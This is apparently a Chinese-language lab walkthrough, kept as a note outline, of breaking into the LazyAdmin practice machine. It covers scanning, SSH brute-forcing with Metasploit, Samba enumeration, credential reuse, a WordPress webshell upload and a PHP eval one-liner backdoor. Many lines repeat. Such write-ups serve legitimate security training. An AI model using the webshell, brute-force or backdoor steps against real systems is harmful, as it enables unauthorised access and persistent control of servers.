Lazyadmin - 幕布
Lazyadmin- 前期信收集
- netdiscover(arp-scan -l)探測存活主機,發現目標IP
- IP:192.168.1.16
- IP:192.168.1.16
- nmap 掃描
- 開放了較多的服務如HTTP SSH Mysql等
- 開放了較多的服務如HTTP SSH Mysql等
- nikto 掃描
- 有很多的資訊,apache版本過時,允許GET HEAD POST 等請求,php的版本,robots.txt,好像一句話木馬利用了POST請求
- 有很多的資訊,apache版本過時,允許GET HEAD POST 等請求,php的版本,robots.txt,好像一句話木馬利用了POST請求
- dirb 掃描
- phpadmin,wordpress這些相關的目錄
- phpadmin,wordpress這些相關的目錄
- netdiscover(arp-scan -l)探測存活主機,發現目標IP
- 探索相關服務
- 訪問其網址
-
- 查看robots.txt
- 都是不允許的
- 進行查看只能看到backnote里面有些代碼,圖片
- 都是不允許的
- 發現還有wordpress的博客
-
- 有phpamdin界面
- 發現進制空密碼登錄
- 發現進制空密碼登錄
- wordpress admin登錄界面
-
- 當前思路
- 先獲取phpmyadmin的用戶及密碼,
- 在資料庫中查找有用資訊
- 如果找到了wordpress的用戶名,密碼,嘗試登錄,用wpscan掃描
- 上傳相關的phpshell,獲取權限,再進一步探索
- 訪問其網址
- 進一步了解
- 前面忽略了一個重要的埠資訊,6667 irc
- 通過查詢資料
- IRC全名為Internet Relay Chat,是一款即時聊天工具,類似網路聊天室,但功能更強大
- InspIRCd是一款現代化,快速的IRC服務器,也是少數幾個IRC服務器應用程式之一,可提供高性能和穩定性,并以C ++撰寫, 它是在您的服務器上構建自己的IRC的最佳解決方案之一, 它支持兩個加密庫,OpenSSL和gnutls,并支持許多服務,如anope主題, InspIRCd基于提供許多模塊的模塊化IRCd, 如果要在InspIRCd上啟用模塊,則只需編輯modules.conf檔案,并為模塊添加新行,
- 通過查詢資料
- 還有一個445埠,經過了解
- 445埠是一個毀譽參半的埠,有了它我們可以在局域網中輕松訪問各種共享檔案夾或共享列印機,但也正是因為有了它,黑客們才有了可乘之機,他們能通過該埠偷偷共享你的硬碟,甚至會在悄無聲息中將你的硬碟格式化掉! [1] 2017年10月,由于病毒“壞兔子”來襲,國家互聯網應急中心等安全機構建議用戶及時關閉計算機以及網路設備上的445和139埠
- 說明可以通過某種方式訪問共享檔案夾
- 安裝irc還是比較繁瑣,暫時擱置
- 從SSH入手
- 在msf中查找與ssh_login相關的工具
-
- 選擇auxiliary/scanner/ssh/ssh_login
- 查看并設定相關引數,包括IP 用戶名(在網址上看到了togie,猜想很有可能),字典
- 查看并設定相關引數,包括IP 用戶名(在網址上看到了togie,猜想很有可能),字典
- 運行后,成功的破解出來
- 密碼為12345
- 密碼為12345
- 試試看其他的登錄界面能否成功,都不行
- 直接登錄SSH
-
- 發現這個用戶有root權限
- 似乎這個靶機只需要獲取root權限即可沒有flag
- 似乎這個靶機只需要獲取root權限即可沒有flag
- 在msf中查找與ssh_login相關的工具
- 前面忽略了一個重要的埠資訊,6667 irc
- 換種方式獲取權限
- 從445埠samba服務器開始
- samba
- Samba是在Linux和UNIX系統上實作SMB協議的一個免費軟體,由服務器及客戶端程式構成,SMB(Server Messages Block,資訊服務塊)是一種在局域網上共享檔案和列印機的一種通信協議,它為局域網內的不同計算機之間提供檔案及列印機等資源的共享服務,SMB協議是客戶機/服務器型協議,客戶機通過該協議可以訪問服務器上的共享檔案系統、列印機及其他資源,通過設定“NetBIOS over TCP/IP”使得Samba不但能與局域網路主機分享資源,還能與全世界的電腦分享資源,
- 使用工具enum4linux
- Enum4linux是一個用于列舉來自Windows和Samba系統的資訊的工具, 它試圖提供與以前從www.bindview.com可用的enum.exe類似的功能, 它是用Perl撰寫的,基本上是一個包裝Samba工具smbclient,rpclient,net和nmblookup,
- enum4linux 192.168.1.16
- 發現共享目錄允許空口令
- 有個用戶是LAZYSYSADMIN 密碼可能是5位數
- 發現共享目錄允許空口令
- enum的使用比較重要,需要進一步了解
- 使用不同的方式都可以連接到共享服務器,三種
- https://blog.51cto.com/57388/1552978
- 我直接在kali 檔案中進行連接
- 連接時可以不輸入密碼,也可以輸入前面獲得的用戶名和密碼,但是在后面嘗試放入檔案時被拒絕,修改檔案的擴展名也不行,看來只有查看的權限
- 連接時可以不輸入密碼,也可以輸入前面獲得的用戶名和密碼,但是在后面嘗試放入檔案時被拒絕,修改檔案的擴展名也不行,看來只有查看的權限
- 查看檔案
- deet.txt
- 這個密碼之前已經找到
- 這個密碼之前已經找到
- 查看wordpress的組態檔,看到密碼
-
- deet.txt
- 登錄phpmyadmin
-
- 去登錄wordpress
-
- 上傳webshell
- 可能需要將檔案名修改以便能正常上傳,或者直接復制檔案,但是這樣不能執行這個檔案起不到作用
- 可能需要將檔案名修改以便能正常上傳,或者直接復制檔案,但是這樣不能執行這個檔案起不到作用
- 通過上傳之前用過的一個webshell
-
- 上傳在Kali上找到的shell
- 監聽埠也能連接
- 監聽埠也能連接
- 使用蟻劍和菜刀,連接shell
- 更長遠的進行連接,需要留下后門之類的,類似前面的那個webshell
- 接著使用一句話木馬,<?php @eval($_POST['12345']);?>
- php檔案放在了htm下,wordpress也可以
以上內容整理于 幕布
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/6596.html
標籤:其他